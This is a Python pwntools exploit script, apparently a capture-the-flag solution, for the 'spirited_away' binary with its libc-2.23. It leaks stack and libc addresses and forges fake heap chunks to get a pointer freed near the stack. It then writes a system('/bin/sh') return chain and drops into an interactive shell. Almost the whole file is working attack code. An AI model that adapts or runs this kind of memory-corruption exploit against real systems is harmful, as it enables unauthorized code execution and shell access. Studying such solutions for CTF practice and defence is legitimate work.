import glob
import os
import random
import signal
import struct
import sys
import time

from pwn import *
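# Suffix appended to the names of the helper files this script drops in /tmp
# (gdb_symbols*, gdb_pid*, gdb_script*); empty here.
salt = ''


def clear(signum=None, stack=None):
    """Remove the /tmp helper files and terminate the script.

    Installed as the handler for SIGINT/SIGHUP/SIGTERM and also called once
    the interactive session ends, so the two unused parameters keep the
    signal-handler signature.

    Args:
        signum: signal number when invoked as a handler, otherwise None.
        stack: interrupted frame when invoked as a handler, otherwise None.

    Raises:
        SystemExit: always, with status 0.
    """
    print('Strip all debugging information')
    # Expand the patterns in-process instead of handing a shell a string that
    # embeds `salt`; a failed removal is ignored to keep `rm -f` semantics.
    for prefix in ('gdb_symbols', 'gdb_pid', 'gdb_script'):
        for path in glob.glob('/tmp/%s%s*' % (prefix, salt)):
            try:
                os.remove(path)
            except OSError:
                pass
    sys.exit(0)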
# Route SIGINT, SIGHUP and SIGTERM to clear() so the /tmp helper files are
# removed even when the script is interrupted.
for _signal_no in (signal.SIGINT, signal.SIGHUP, signal.SIGTERM):
    signal.signal(_signal_no, clear)
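# Best effort: write the (currently empty) C source used for gdb symbols.
# A failure only prints the error and does not stop the script.
try:
    gdb_symbols = '''
'''
    # `with` closes the handle even if write() raises; the original
    # open/write/close sequence leaked it on error.
    with open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') as f:
        f.write(gdb_symbols)
except Exception as e:
    print(e)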
context.arch = "i386"  # 32-bit x86 target
execve_file = './spirited_away'  # challenge binary, spawned locally below
sh = process(execve_file)
elf = ELF(execve_file)
libc = ELF('./libc-2.23.so')  # libc build the symbol offsets below are read from
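# Best effort: drop the pid of the spawned process and a gdb command script
# into /tmp so a debugger can be attached by hand; errors are printed and
# the script continues without them.
try:
    gdbscript = '''
# b *0x80486F8
b *0x8048771
b free
b malloc
c
'''
    # `with` guarantees both handles are closed even when a write fails.
    with open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') as f:
        f.write(str(proc.pidof(sh)[0]))
    with open('/tmp/gdb_script{}'.replace('{}', salt), 'w') as f:
        f.write(gdbscript)
except Exception as e:
    print(e)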
# NOTE(review): this script is written for Python 2 — str payloads are
# concatenated with p32()/flat() output and an iterator's .next() is used later.
# First round: answer the four prompts; the movie answer is 56 'c' bytes.
sh.sendafter('Please enter your name: ', 'aaaa')
sh.sendafter('Please enter your age: ', '1\n')
sh.sendafter('Why did you came to see this movie? ', 'c' * 56)
sh.sendafter('Please enter your comment: ', 'dddd')
# The program echoes the 56 bytes back; the 4 bytes that follow are read
# as a little-endian 32-bit stack address.
sh.recvuntil('c' * 56)
stack_addr = u32(sh.recvn(4))
log.success('stack_addr: ' + hex(stack_addr))
sh.recvn(4)  # 4 bytes skipped before the next value of interest
# The next 4 bytes are a libc pointer; presumably 11 bytes into fflush,
# so fflush's offset + 11 is subtracted to get the libc base — confirm.
libc_addr = u32(sh.recvn(4)) - libc.symbols['fflush'] - 11
log.success('libc_addr: ' + hex(libc_addr))
sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
# Nine full rounds (name/age/movie/comment), each answered with one byte
# plus a NUL terminator.
for i in range(9):
    sh.sendafter('Please enter your name: ', 'a\0')
    sh.sendafter('Please enter your age: ', '1\n')
    sh.sendafter('Why did you came to see this movie? ', 'c\0')
    sh.sendafter('Please enter your comment: ', 'd\0')
    sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
# Ninety rounds in which only the age and movie prompts are answered; the
# script expects the name and comment prompts not to appear in these rounds.
for i in range(90):
    sh.sendafter('Please enter your age: ', '1\n')
    sh.sendafter('Why did you came to see this movie? ', 'c\0')
    sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
# One round with crafted answers built from p32() fields; the comment ends
# with a pointer derived from the leaked stack address (stack_addr - 0x60).
sh.sendafter('Please enter your name: ', 'a\0')
sh.sendafter('Please enter your age: ', '1\n')
sh.sendafter('Why did you came to see this movie? ', 'g' * 8 + p32(0) + p32(0x41) + 'f' * 0x38 + p32(0) + p32(0x11))
sh.sendafter('Please enter your comment: ', 'e' * 72 + p32(0) + p32(0) + p32(1) + p32(stack_addr - 0x60))
sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
# Final round: a zero word followed by the libc addresses of system(), exit()
# and a "/bin/sh" string, placed after 64 filler bytes in the name answer.
layout1 = [
    0,
    libc_addr + libc.symbols['system'],
    libc_addr + libc.symbols['exit'],
    libc_addr + libc.search('/bin/sh\0').next(),  # NOTE(review): .next() is Python 2 only; Python 3 needs next(...)
]
sh.sendafter('Please enter your name: ', 'z' * 64 + flat(layout1))
sh.sendafter('Please enter your age: ', '1\n')
sh.sendafter('Why did you came to see this movie? ', 'c\0')
sh.sendafter('Please enter your comment: ', 'd\0')
sh.sendafter('Would you like to leave another comment? <y/n>: ', 'n')  # 'n' ends the prompt loop
sh.interactive()
clear()  # remove the /tmp helper files once the session ends
|